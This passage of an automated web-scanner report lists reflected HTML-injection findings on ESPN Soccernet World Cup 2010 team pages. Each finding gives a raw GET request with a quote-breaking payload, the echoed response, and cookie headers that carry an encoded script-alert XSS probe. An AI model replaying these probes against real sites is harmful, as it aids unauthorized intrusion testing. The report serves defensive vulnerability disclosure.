CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:28:58 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:28:58 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN17
Cache-Expires: Sat, 06 Nov 2010 23:33:58 GMT
Content-Length: 82316
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>South Africa Footba ...[SNIP]... <a href="/worldcup2010/team?team=467&_slug_=south-africa6f1e2"><a>30af7f0b19c&topId=792945&linktext=South+African+president+praises+side"> ...[SNIP]...
2.80. http://soccernet.espn.go.com/worldcup2010/team/_/team/467/south-africa [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/467/south-africa
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c1ec"><a>0e9b1b1a4b5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/467/south-africa?4c1ec"><a>0e9b1b1a4b5=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:27:13 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:27:13 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN33
Cache-Expires: Sat, 06 Nov 2010 23:32:12 GMT
Content-Length: 82424
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>South Africa Footba ...[SNIP]... <a href="/worldcup2010/team?team=467&4c1ec"><a>0e9b1b1a4b5=1&_slug_=south-africa&4c1ec"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9049"><a>2c9ee8a6c83 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/468/slovakiac9049"><a>2c9ee8a6c83 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:28:25 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:28:25 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN16
Cache-Expires: Sat, 06 Nov 2010 23:33:25 GMT
Content-Length: 81977
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Slovakia Football / ...[SNIP]... <a href="/worldcup2010/team?team=468&_slug_=slovakiac9049"><a>2c9ee8a6c83&topId=803490&linktext=Dutch+ease+to+2-1+win+against+Slovakia"> ...[SNIP]...
2.82. http://soccernet.espn.go.com/worldcup2010/team/_/team/468/slovakia [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/468/slovakia
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c864f"><a>dc103401107 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/468/slovakia?c864f"><a>dc103401107=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:25:17 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:25:17 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN07
Cache-Expires: Sat, 06 Nov 2010 23:30:17 GMT
Content-Length: 82085
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Slovakia Football / ...[SNIP]... <a href="/worldcup2010/team?team=468&c864f"><a>dc103401107=1&_slug_=slovakia&c864f"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69682"><a>ede52c78078 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/472/slovenia69682"><a>ede52c78078 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:28:12 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:28:12 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN02
Cache-Expires: Sat, 06 Nov 2010 23:33:12 GMT
Content-Length: 81860
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Slovenia Football / ...[SNIP]... <a href="/worldcup2010/team?team=472&_slug_=slovenia69682"><a>ede52c78078&topId=801122&linktext=Slovenia+come+to+terms+with+exit"> ...[SNIP]...
2.84. http://soccernet.espn.go.com/worldcup2010/team/_/team/472/slovenia [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/472/slovenia
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64674"><a>258595f7676 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/472/slovenia?64674"><a>258595f7676=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:25:20 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:25:20 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN21
Cache-Expires: Sat, 06 Nov 2010 23:30:19 GMT
Content-Length: 81968
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Slovenia Football / ...[SNIP]... <a href="/worldcup2010/team?team=472&64674"><a>258595f7676=1&_slug_=slovenia&64674"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4db0a"><a>888baac8773 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/475/switzerland4db0a"><a>888baac8773 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:28:58 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:28:58 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN31
Cache-Expires: Sat, 06 Nov 2010 23:33:58 GMT
Content-Length: 82022
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Switzerland Footbal ...[SNIP]... <a href="/worldcup2010/team?team=475&_slug_=switzerland4db0a"><a>888baac8773&topId=802287&linktext=Hitzfeld+says+pressure+cost+Swiss"> ...[SNIP]...
2.86. http://soccernet.espn.go.com/worldcup2010/team/_/team/475/switzerland [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/475/switzerland
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82f0d"><a>d5df743ea71 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/475/switzerland?82f0d"><a>d5df743ea71=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:28:17 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:28:17 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN16
Cache-Expires: Sat, 06 Nov 2010 23:33:17 GMT
Content-Length: 82130
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Switzerland Footbal ...[SNIP]... <a href="/worldcup2010/team?team=475&82f0d"><a>d5df743ea71=1&_slug_=switzerland&82f0d"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa8c8"><a>f460e0de5a0 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/478/francefa8c8"><a>f460e0de5a0 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; 